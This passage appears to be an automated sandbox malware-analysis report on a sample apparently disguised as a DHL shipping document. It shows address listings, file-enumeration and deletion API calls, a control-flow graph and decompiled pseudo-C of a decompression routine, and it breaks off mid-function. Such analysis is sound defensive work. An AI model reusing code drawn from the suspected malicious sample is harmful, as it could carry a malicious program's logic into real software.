                                                              0x00405ded
                                                              0x00405ddf
                                                              0x00405de5
                                                              0x00405de5
                                                              0x00405df2
                                                              0x00405df6
                                                              0x00405e02
                                                              0x00405e08
                                                              0x00405e0d
                                                              0x00405e13
                                                              0x00405e1e
                                                              0x00405e24
                                                              0x00405e26
                                                              0x00405e29
                                                              0x00405ed3
                                                              0x00405ed3
                                                              0x00405ed7
                                                              0x00405ed9
                                                              0x00405ed9
                                                              0x00405ed9
                                                              0x00405ed9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e2f
                                                              0x00405e2f
                                                              0x00405e2f
                                                              0x00405e37
                                                              0x00405e57
                                                              0x00405e5f
                                                              0x00405e64
                                                              0x00405e6b
                                                              0x00405e86
                                                              0x00405e8b
                                                              0x00405e8d
                                                              0x00405eb1
                                                              0x00405e8f
                                                              0x00405e8f
                                                              0x00405e92
                                                              0x00405ea6
                                                              0x00405e94
                                                              0x00405e97
                                                              0x00405e9f
                                                              0x00405e9f
                                                              0x00405e92
                                                              0x00405e6d
                                                              0x00405e73
                                                              0x00405e75
                                                              0x00405e7b
                                                              0x00405e7b
                                                              0x00405e75
                                                              0x00000000
                                                              0x00405e6b
                                                              0x00405e39
                                                              0x00405e41
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e43
                                                              0x00405e4b
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e4d
                                                              0x00405e55
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405eb6
                                                              0x00405ebe
                                                              0x00405ec4
                                                              0x00405ec4
                                                              0x00405ecd
                                                              0x00000000
                                                              0x00405ecd
                                                              0x00405df8
                                                              0x00405e00
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405dbc
                                                              0x00405dbc
                                                              0x00405dbe
                                                              0x00405ede
                                                              0x00405ee0
                                                              0x00405ee3
                                                              0x00405f34
                                                              0x00405f34
                                                              0x00405f34
                                                              0x00405ee5
                                                              0x00405ee8
                                                              0x00405ef3
                                                              0x00405ef8
                                                              0x00405efa
                                                              0x00000000
                                                              0x00000000
                                                              0x00405efd
                                                              0x00405f09
                                                              0x00405f0e
                                                              0x00405f10
                                                              0x00000000
                                                              0x00405f2b
                                                              0x00405f12
                                                              0x00405f15
                                                              0x00000000
                                                              0x00000000
                                                              0x00405f1a
                                                              0x00000000
                                                              0x00405f21
                                                              0x00405eea
                                                              0x00405eea
                                                              0x00000000
                                                              0x00405eea
                                                              0x00405dc4
                                                              0x00405dc7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405dc7

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,7476FAA0,7476F560,00000000), ref: 00405D9D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse5B62.tmp\*.*,\*.*), ref: 00405DE5
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse5B62.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E0E
                                                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nse5B62.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse5B62.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E1E
                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                              • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: .$.$C:\Users\user\AppData\Local\Temp\nse5B62.tmp\*.*$\*.*
                                                              • API String ID: 2035342205-2790943470
                                                              • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                              • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                              • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                              • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 553 406d5f-406d64 554 406dd5-406df3 553->554 555 406d66-406d95 553->555 556 4073cb-4073e0 554->556 557 406d97-406d9a 555->557 558 406d9c-406da0 555->558 559 4073e2-4073f8 556->559 560 4073fa-407410 556->560 561 406dac-406daf 557->561 562 406da2-406da6 558->562 563 406da8 558->563 564 407413-40741a 559->564 560->564 565 406db1-406dba 561->565 566 406dcd-406dd0 561->566 562->561 563->561 570 407441-40744d 564->570 571 40741c-407420 564->571 567 406dbc 565->567 568 406dbf-406dcb 565->568 569 406fa2-406fc0 566->569 567->568 572 406e35-406e63 568->572 576 406fc2-406fd6 569->576 577 406fd8-406fea 569->577 579 406be3-406bec 570->579 573 407426-40743e 571->573 574 4075cf-4075d9 571->574 580 406e65-406e7d 572->580 581 406e7f-406e99 572->581 573->570 578 4075e5-4075f8 574->578 582 406fed-406ff7 576->582 577->582 586 4075fd-407601 578->586 583 406bf2 579->583 584 4075fa 579->584 585 406e9c-406ea6 580->585 581->585 587 406ff9 582->587 588 406f9a-406fa0 582->588 590 406bf9-406bfd 583->590 591 406d39-406d5a 583->591 592 406c9e-406ca2 583->592 593 406d0e-406d12 583->593 584->586 595 406eac 585->595 596 406e1d-406e23 585->596 604 407581-40758b 587->604 605 406f7f-406f97 587->605 588->569 594 406f3e-406f48 588->594 590->578 597 406c03-406c10 590->597 591->556 606 406ca8-406cc1 592->606 607 40754e-407558 592->607 598 406d18-406d2c 593->598 599 40755d-407567 593->599 600 40758d-407597 594->600 601 406f4e-407117 594->601 612 406e02-406e1a 595->612 613 407569-407573 595->613 602 406ed6-406edc 596->602 603 406e29-406e2f 596->603 597->584 611 406c16-406c5c 597->611 614 406d2f-406d37 598->614 599->578 600->578 601->579 609 406f3a 602->609 610 406ede-406efc 602->610 603->572 603->609 604->578 605->588 616 406cc4-406cc8 606->616 607->578 609->594 617 406f14-406f26 610->617 618 406efe-406f12 610->618 619 406c84-406c86 611->619 620 406c5e-406c62 611->620 612->596 613->578 614->591 614->593 616->592 621 406cca-406cd0 616->621 624 406f29-406f33 617->624 618->624 627 406c94-406c9c 619->627 628 406c88-406c92 619->628 625 406c64-406c67 GlobalFree 620->625 626 406c6d-406c7b GlobalAlloc 620->626 622 406cd2-406cd9 621->622 623 406cfa-406d0c 621->623 629 406ce4-406cf4 GlobalAlloc 622->629 630 406cdb-406cde GlobalFree 622->630 623->614 624->602 631 406f35 624->631 625->626 626->584 632 406c81 626->632 627->616 628->627 628->628 629->584 629->623 630->629 634 407575-40757f 631->634 635 406ebb-406ed3 631->635 632->619 634->578 635->602
                                                              C-Code - Quality: 98%
                                                              			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
